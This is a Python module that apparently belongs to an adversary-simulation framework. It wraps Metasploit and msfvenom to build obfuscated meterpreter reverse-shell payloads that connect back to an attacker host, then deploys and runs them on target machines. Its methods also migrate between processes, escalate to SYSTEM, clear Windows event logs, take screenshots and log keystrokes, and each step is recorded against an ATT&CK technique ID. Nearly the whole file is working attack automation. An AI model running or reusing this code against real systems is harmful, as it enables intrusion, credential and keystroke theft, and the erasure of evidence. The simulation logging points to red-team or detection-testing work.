#!/usr/bin/env python3 """ Module to control Metasploit and related tools (MSFVenom) on the attack server """ import time import socket import os import random import requests from pymetasploit3.msfrpc import MsfRpcClient # from app.machinecontrol import Machine from app.attack_log import AttackLog from app.interface_sfx import CommandlineColors from app.exceptions import MetasploitError, ServerError # https://github.com/DanMcInerney/pymetasploit3 class Metasploit(): """ Metasploit class for basic Metasploit wrapping """ def __init__(self, password, attack_logger, **kwargs): """ :param password: password for the msfrpcd :param attack_logger: The attack logger to use for logging/printing :param kwargs: Relevant ones: uri, port, server, username """ self.password = password self.attack_logger = attack_logger self.username = kwargs.get("username", None) self.kwargs = kwargs self.client = None # Optional attacker: If a running attacker machine is passed, we take it and start the msfrpcd # Alternative: The server is taken and we expect an already running msfrpcd there self.attacker = kwargs.get("attacker", None) if self.attacker: # we expect a running attacker but without a running msfrcpd self.start_msfrpcd() kwargs["server"] = self.attacker.get_ip() time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client. def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler', lhost=None): """ Start a metasploit handler and wait for external payload to connect @param payload: The payload being used in the implant @param exploit: Normally the generic handler. Overwrite it if you feel lucky @param lhost: the ip of the attack host. Use this to use the attacker ip as seen from the controller. @:returns: res, which contains "job_id" and "uuid" """ exp = self.get_client().modules.use('exploit', exploit) # print(exploit.description) # print(exploit.missing_required) pl = self.get_client().modules.use('payload', payload) # print(payload.description) # print(payload.missing_required) if lhost is None: lhost = self.attacker.get_ip() pl["LHOST"] = lhost print(f"Creating stub for external payload Exploit: {exploit} Payload: {payload}, lhost: {lhost}") res = exp.execute(payload=pl) print(res) return res def start_msfrpcd(self): """ Starts the msfrpcs on the attacker. Metasploit must alredy be installed there ! """ cmd = f"killall msfrpcd; nohup msfrpcd -P {self.password} -U {self.username} -S &" self.attacker.remote_run(cmd, disown=True) # print("msfrpcd started") # breakpoint() time.sleep(3) def get_client(self): """ Get a local metasploit client connected to the metasploit server """ # print("starting get client") # print(f"Password: {self.password}") # print(f"Kwargs: {self.kwargs}") if self.client: return self.client self.client = None retries = 5 sleeptime = 5 while retries: try: self.client = MsfRpcClient(self.password, **self.kwargs) break except requests.exceptions.ConnectionError: self.start_msfrpcd() time.sleep(sleeptime) sleeptime += 5 print("Failed getting connection to msfrpcd. Retries left: {retries}") retries -= 1 if self.client is None: raise ServerError("Was not able to properly start and connect to msfrpcd") return self.client def wait_for_session(self, retries=50): """ Wait until we get a session """ while self.get_client().sessions.list == {}: time.sleep(1) print(f"Metasploit waiting to get any session {retries}") retries -= 1 if retries <= 0: raise MetasploitError("Can not find any session") def get_sid(self, session_number=0): """ Get the first session between hacked target and the metasploit server @param session_number: number of the session to get """ self.wait_for_session() return list(self.get_client().sessions.list)[session_number] def get_sid_to(self, target): """ Get the session to a specified target @param target: a target machine to find in the session list """ print(f"Sessions: {self.get_client().sessions.list}") # Get_ip can also return a network name. Matching a session needs a real ip name_resolution_worked = True try: target_ip = socket.gethostbyname(target.get_ip()) except socket.gaierror: target_ip = target.get_ip() # Limp on feature if we can not get a name resolution name_resolution_worked = False print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}") retries = 100 while retries > 0: for key, value in self.get_client().sessions.list.items(): if value["session_host"] == target_ip: # print(f"session list: {self.get_client().sessions.list}") return key time.sleep(1) retries -= 1 raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}") def meterpreter_execute(self, cmds: list[str], session_number: int, delay=0) -> list[str]: """ Executes commands on the meterpreter, returns results read from shell @param cmds: commands to execute, a list @param session_number: session number @param delay: optional delay between calling the command and expecting a result @:return: the string results """ shell = self.client.sessions.session(self.get_sid(session_number)) res = [] for cmd in cmds: shell.write(cmd.strip()) time.sleep(delay) res.append(shell.read()) return res def meterpreter_execute_on(self, cmds: list[str], target, delay=0) -> list[str]: """ Executes commands on the meterpreter, returns results read from shell @param cmds: commands to execute, a list @param target: target machine @param delay: optional delay between calling the command and expecting a result @:return: the string results """ session_id = self.get_sid_to(target) # print(f"Session ID: {session_id}") shell = self.client.sessions.session(session_id) res = [] time.sleep(1) # To ensure an active session for cmd in cmds: shell.write(cmd) time.sleep(delay) retries = 20 shell_result = "" while retries > 0: shell_result += shell.read() time.sleep(0.5) # Command needs time to execute retries -= 1 res.append(shell_result) return res def smart_infect(self, target, payload_type="windows/x64/meterpreter/reverse_https", payload_name="babymetal.exe"): """ Checks if a target already has a meterpreter session open. Will deploy a payload if not """ # TODO Smart_infect should detect the platform of the target and pick the proper parameters based on that try: self.start_exploit_stub_for_external_payload(payload=payload_type) self.wait_for_session(2) except MetasploitError: self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Create payload {payload_name} replacement{CommandlineColors.ENDC}", 1) venom = MSFVenom(self.attacker, target, self.attack_logger) venom.generate_and_deploy(payload=payload_type, architecture="x86", platform="windows", lhost=self.attacker.get_ip(), format="exe", outfile=payload_name, encoder="x86/shikata_ga_nai", iterations=5 ) self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {payload_name} replacement - waiting for meterpreter shell{CommandlineColors.ENDC}", 1) self.start_exploit_stub_for_external_payload(payload=payload_type) self.wait_for_session() ########################################################################## class MSFVenom(): """ Class to remote controll payload generator MSFVenom on the attacker machine """ def __init__(self, attacker, target, attack_logger: AttackLog): """ :param attacker: attacker machine :param target: target machine :param attack_logger: The logger for the attack """ # https://www.offensive-security.com/metasploit-unleashed/msfvenom/ self.attacker = attacker self.target = target self.attack_logger = attack_logger def generate_payload(self, **kwargs): """ Generates a payload on the attacker machine """ payload = kwargs.get("payload", None) architecture = kwargs.get("architecture", None) platform = kwargs.get("platform", self.target.get_os()) lhost = kwargs.get("lhost", self.attacker.get_ip()) file_format = kwargs.get("format", None) # file format outfile = kwargs.get("outfile", "payload.exe") encoder = kwargs.get("encoder", None) iterations = kwargs.get("iterations", None) cmd = "msfvenom" if architecture is not None: if architecture not in ["x86", "x64"]: raise MetasploitError(f"MSFVenom wrapper does not support architecture {architecture}") cmd += f" -a {architecture}" if platform is not None: if platform not in ["windows", "linux"]: raise MetasploitError(f"MSFVenom wrapper does not support platform {platform}") cmd += f" --platform {platform}" if payload is not None: cmd += f" -p {payload}" if lhost is not None: cmd += f" LHOST={lhost}" if file_format is not None: cmd += f" -f {file_format}" if outfile is not None: cmd += f" -o {outfile}" if encoder is not None: if encoder not in ["x86/shikata_ga_nai"]: raise MetasploitError(f"MSFVenom wrapper does not support encoder {encoder}") cmd += f" -e {encoder}" if iterations is not None: cmd += f" -i {iterations}" cmd += " SessionRetryWait=1 " # Detecting all the mistakes that already have been made. To be continued # Check if encoder supports the architecture if encoder == "x86/shikata_ga_nai" and architecture == "x64": raise MetasploitError(f"Encoder {encoder} does not support 64 bit architecture") # Check if payload is for the right amount of bit if architecture == "x64" and "/x64/" not in payload: raise MetasploitError(f"Payload {payload} does not support 64 bit architecture") if architecture == "x86" and "/x64/" in payload: raise MetasploitError(f"Payload {payload} does not support 32 bit architecture") # Check if payload is platform if platform not in payload: raise MetasploitError(f"Payload {payload} support platform {platform}") # Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here print(cmd) self.attacker.remote_run(cmd) def generate_and_deploy(self, **kwargs): """ Will generate the payload and directly deploy it to the target :return: """ self.generate_payload(**kwargs) payload_name = kwargs.get("outfile", "payload.exe") self.attacker.get(payload_name, self.target.get_machine_path_external()) src = os.path.join(self.target.get_machine_path_external(), payload_name) self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Generated {payload_name}...deploying it{CommandlineColors.ENDC}", 1) # Deploy to target if self.attack_logger: logid = self.attack_logger.start_file_write("", self.target.get_name(), payload_name) playground = self.target.get_playground() print(f"Putting to {self.target.get_name() }/ {playground}") self.target.put(src, playground) if self.attack_logger: self.attack_logger.stop_file_write("", self.target.get_name(), payload_name, logid=logid) if self.target.get_os() == "linux": if self.target.get_playground() is not None: cmd = f"cd {self.target.get_playground()};" else: cmd = "" cmd += f"chmod +x {payload_name}; ./{payload_name}" if self.target.get_os() == "windows": cmd = f'wmic process call create "%homepath%\\{payload_name}",""' print(cmd) if self.attack_logger: logid = self.attack_logger.start_execute_payload("", self.target.get_name(), cmd) res = self.target.remote_run(cmd, disown=True) print(f"Running payload, result is {res}") if self.attack_logger: self.attack_logger.stop_execute_payload("", self.target.get_name(), cmd, logid=logid) self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Executed payload {payload_name} on {self.target.get_name()} {CommandlineColors.ENDC}", 1) ################ class MetasploitInstant(Metasploit): """ A simple metasploit class with pre-defined metasploit attacks and logging. Just add water The attacks pre-defioned in here are the bread-and-butter attacks, the most basic ones. Those you will need all the time when simulating and adversary. No need to add specific/specific ones in here. In attack plugins you will find all the features as well. Better code them there. """ def parse_ps(self, ps_output): """ Parses the data from ps :param ps_output: Metasploit ps output :return: A list of dicts """ ps_data = [] for line in ps_output.split("\n")[6:]: pieces = line.split(" ") cleaned_pieces = [] for piece in pieces: if len(piece): cleaned_pieces.append(piece) if len(cleaned_pieces) > 2: rep = {"PID": int(cleaned_pieces[0].strip()), "PPID": int(cleaned_pieces[1].strip()), "Name": cleaned_pieces[2].strip(), "Arch": None, "Session": None, "User": None, "Path": None} if len(cleaned_pieces) >= 4: rep["Arch"] = cleaned_pieces[3].strip() if len(cleaned_pieces) >= 5: rep["Session"] = int(cleaned_pieces[4].strip()) if len(cleaned_pieces) >= 6: rep["User"] = cleaned_pieces[5].strip() if len(cleaned_pieces) >= 7: rep["Path"] = cleaned_pieces[6].strip() ps_data.append(rep) return ps_data def filter_ps_results(self, data, user=None, name=None, arch=None): """ Filter the process lists for certain @param user: The user to filter for. @param name: The process name to filter for (executable name) @param arch: The architecture to select. 'x64' is one option """ res = data if user is not None: res = [item for item in res if item["User"] == user] if name is not None: res = [item for item in res if item["Name"].lower() == name.lower()] if arch is not None: res = [item for item in res if item["Arch"] == arch] return res def ps_process_discovery(self, target, **kwargs): """ Do a process discovery on the target """ command = "ps -ax" ttp = "T1057" tactics = "Discovery" tactics_id = "TA0007" description = "Process discovery can be used to identify running security solutions, processes with elevated privileges, interesting services." self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="ps", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def migrate(self, target, user=None, name=None, arch=None): """ Migrate to a process matching certain criteria @param user: The user to filter for. @param name: The process name to filter for (executable name) @param arch: The architecture to select. 'x64' is one option """ ttp = "T1055" process_list = self.ps_process_discovery(target) ps = self.parse_ps(process_list[0]) filtered_list = self.filter_ps_results(ps, user, name, arch) if len(filtered_list) == 0: print(process_list) raise MetasploitError("Did not find a matching process to migrate to") # picking random target process target_process = random.choice(filtered_list) print(f"Migrating to process {target_process}") command = f"migrate {target_process['PID']}" self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, result=res) return res def arp_network_discovery(self, target, **kwargs): """ Do a network discovery on the target """ command = "arp" ttp = "T1016" tactics = "Discovery" tactics_id = "TA0007" description = "Network discovery can be a first step for lateral movement." self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="arp", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def nslookup(self, target, target2, **kwargs): """ Do a nslookup discovery on the target @param target: Command runs here @param target2: This one is looked up """ command = f"execute -f nslookup.exe -H -i -a '{target2.get_ip()}'" ttp = "T1018" tactics = "Discovery" tactics_id = "TA0007" description = "Nslookup to get information on a specific target" self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="nslookup", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def getsystem(self, target, **kwargs): """ Do a network discovery on the target """ command = "getsystem" ttp = "????" # It uses one out of three different ways to elevate privileges. tactics = "Privilege Escalation" tactics_id = "TA0004" description = """ Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried: * named pipe impersonation using cmd * named pipe impersonation using a dll * token duplication """ # https://docs.rapid7.com/metasploit/meterpreter-getsystem/ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="getsystem", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def clearev(self, target): """ Clears windows event logs """ command = "clearev" ttp = "T1070.001" # It uses one out of three different ways to elevate privileges. self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, result=res) return res def screengrab(self, target): """ Creates a screenshot Before using it, migrate to a process running while you want to monitor. One with the permission "NT AUTHORITY\\SYSTEM" """ command = "screengrab" ttp = "T1113" # It uses one out of three different ways to elevate privileges. self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp) res = self.meterpreter_execute_on(["use espia"], target) print(res) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, result=res) return res def keylogging(self, target, monitoring_time): """ Starts keylogging Before using it, migrate to a process running while you want to monitor. "winlogon.exe" will monitor user logins. "explorer.exe" during the session. @param monitoring_time: Seconds the keylogger is running @param monitoring_time: The time to monitor the keys. In seconds """ command = "keyscan_start" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp) res = self.meterpreter_execute_on([command], target) print(res) time.sleep(monitoring_time) res = self.meterpreter_execute_on(["keyscan_dump"], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, result=res) return res def getuid(self, target): """ Returns the UID """ command = "getuid" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, result=res) return res[0] def sysinfo(self, target): """ Returns the sysinfo """ command = "sysinfo" ttp = "T1082" # It uses one out of three different ways to elevate privileges. self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, result=res) return res[0] def upload(self, target, src, dst, **kwargs): """ Upload file from metasploit controller to target @param src: source file name on metasploit controller @param dst: destination file name on target machine """ command = f"upload {src} '{dst}' " ttp = "????" # It uses one out of three different ways to elevate privileges. tactics = "???" tactics_id = "???" description = """ Uploading new files to the target. Can be config files, tools, implants, ... """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="upload", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res